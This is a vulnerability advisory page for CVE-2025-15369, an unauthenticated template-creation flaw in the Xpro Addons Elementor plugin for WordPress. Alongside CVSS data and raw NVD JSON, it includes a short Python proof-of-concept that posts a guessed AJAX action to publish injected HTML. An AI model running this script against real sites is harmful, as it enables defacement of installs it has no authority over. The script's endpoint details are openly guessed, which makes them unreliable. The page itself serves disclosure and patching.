Security Vulnerability Report
CVE-2025-15369 CVSS 5.3 MEDIUM


Published: 2026-05-20 04:16:43
Last Modified: 2026-05-20 13:54:55

Description

The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Xpro Addons — 140+ Widgets for Elementor <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit(target_url):
    # Target endpoint usually is admin-ajax.php
    url = f"{target_url}/wp-admin/admin-ajax.php"
    # Data payload based on the vulnerable function
    # Action name is typically derived from the function name, e.g., xpro_get_content_editor
    payload = {
        "action": "xpro_get_content_editor",
        "template_data": "<h1>Malicious Content</h1>",
        "status": "publish",
    }
    try:
        # timeout added so the request cannot hang indefinitely
        response = requests.post(url, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if template was created.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = "http://example.com"  # Replace with actual target
    exploit(target)
```

References

- https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547
- https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-15369", "sourceIdentifier": "[email protected]", "published": "2026-05-20T04:16:42.597", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve", "source": "[email protected]"}]}}
```